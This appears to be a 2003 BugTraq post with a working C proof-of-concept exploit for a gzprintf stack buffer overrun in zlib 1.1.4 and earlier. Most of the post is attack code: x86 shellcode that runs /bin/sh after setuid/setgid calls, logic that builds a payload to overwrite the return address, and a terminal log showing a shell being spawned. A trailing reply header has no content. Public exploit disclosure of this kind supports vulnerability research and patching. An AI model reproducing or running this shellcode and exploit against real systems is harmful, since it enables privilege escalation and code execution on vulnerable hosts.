BugTraq
poc zlib sploit just for fun :) Feb 23 2003 06:38PM
Crazy Einstein (crazy_einstein yahoo com) (1 replies)

/*
\ PoC local exploit for zlib <= 1.1.4 (stack buffer overrun in gzprintf)
/ just for fun..not for root :)
/ Linux/x86 (32-bit) only: it returns into shellcode living on its own stack,
/ so it needs a non-randomized, executable stack to work.
/ Usage: gcc -o zlib zlib.c -lz
/ by CrZ [crazy_einstein (at) yahoo (dot) com [email concealed]] lbyte
[lbyte.void.ru]
*/

#include <errno.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>
#include <unistd.h>

#include <zlib.h>

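/*
 * Entry point. Builds a payload made of one repeated 4-byte return address
 * that points into the shellcode below (an automatic array in this frame)
 * and hands it to gzprintf() through "%s". On zlib <= 1.1.4 gzprintf formats
 * into a fixed-size stack buffer that is smaller than the payload, so the
 * overrun is expected to replace gzprintf's saved return address with the
 * shellcode address. Returns 0 if gzprintf comes back (exploit did not fire),
 * 1 on a setup error.
 */
int main(int argc, char **argv) {
    enum { PAYLOAD_LEN = 5000, BADBUFF_LEN = 10000, SLED_SKIP = 4 };

    /*
     * Linux/x86 int 0x80 shellcode: 8-byte NOP sled, then what looks like
     * setuid/setgid syscalls and an execve of the trailing "/bin/sh".
     */
    char shell[] =
    "\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x31\xc0\x31\xdb\xb0\x17\xcd\x80"
    "\xb0\x2e\xcd\x80\xeb\x15\x5b\x31"
    "\xc0\x88\x43\x07\x89\x5b\x08\x89"
    "\x43\x0c\x8d\x4b\x08\x31\xd2\xb0"
    "\x0b\xcd\x80\xe8\xe6\xff\xff\xff"
    "/bin/sh";
    gzFile f;
    int ret;
    uintptr_t base;           /* address of shell[] */
    uintptr_t target;         /* address the clobbered return address jumps to */
    unsigned char cret[4];    /* target, little-endian, 32-bit */
    char badbuff[BADBUFF_LEN];
    size_t i;

    (void)argc;
    (void)argv;

    /* Four-byte return addresses and int 0x80 shellcode only make sense on 32-bit x86. */
    if (sizeof(void *) != 4) {
        fprintf(stderr, "[!] this PoC needs a 32-bit build (4-byte pointers)\n");
        return 1;
    }

    /*
     * Take the address directly instead of a "%p" -> sscanf("%x") round trip,
     * which wrote an unsigned int into a long (UB). Jump SLED_SKIP bytes into
     * the NOP sled; the carry is computed before splitting into bytes, so a
     * low byte near 0xff no longer produces a wrong address.
     */
    base = (uintptr_t)shell;
    target = base + SLED_SKIP;

    cret[0] = (unsigned char)(target & 0xff);
    cret[1] = (unsigned char)((target >> 8) & 0xff);
    cret[2] = (unsigned char)((target >> 16) & 0xff);
    cret[3] = (unsigned char)((target >> 24) & 0xff);

    /*
     * The payload travels through a "%s" conversion, so a NUL byte anywhere
     * in the address would silently truncate it instead of reaching the
     * saved return address. Fail loudly rather than "exploit" nothing.
     */
    for (i = 0; i < sizeof cret; i++) {
        if (cret[i] == 0) {
            fprintf(stderr, "[!] target 0x%lx contains a NUL byte, aborting\n",
                    (unsigned long)target);
            return 1;
        }
    }

    printf("[>] exploiting...\n");

    if (!(f = gzopen("/dev/null", "w"))) {
        perror("/dev/null");
        return 1;
    }

    printf("[>] xret = 0x%lx\n", (unsigned long)base);

    /* PAYLOAD_LEN bytes of the address; the rest of badbuff stays zero, so it is NUL-terminated. */
    memset(badbuff, 0, sizeof badbuff);
    for (i = 0; i + sizeof cret <= PAYLOAD_LEN; i += sizeof cret) {
        memcpy(badbuff + i, cret, sizeof cret);
    }

    /* No-ops unless the process already has root; failures are expected and ignored. */
    (void)setuid(0);
    (void)setgid(0);

    /*
     * The stream we actually opened is passed (the original handed a FILE *
     * in here). On a vulnerable zlib control never returns from this call.
     */
    ret = gzprintf(f, "%s", badbuff);

    (void)setuid(0);
    (void)setgid(0);
    printf(">Sent!..\n");
    printf("gzprintf -> %d\n", ret);
    ret = gzclose(f);
    printf("gzclose -> %d [%d]\n", ret, errno);

    return 0;
}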

[crz@blacksand crz]$ gcc -o zlib zlib.c -lz
[crz@blacksand crz]$ ./zlib
[>] exploiting...
[>] xret = 0xbffff8f0
sh-2.05b$ exit
exit
[crz@blacksand crz]$


Re: poc zlib sploit just for fun :) Feb 24 2003 11:51PM
Kelledin kelledin+BTQ (at) skarpsey.dyndns (dot) org [email concealed] (kelledin+BTQ skarpsey dyndns org)


 
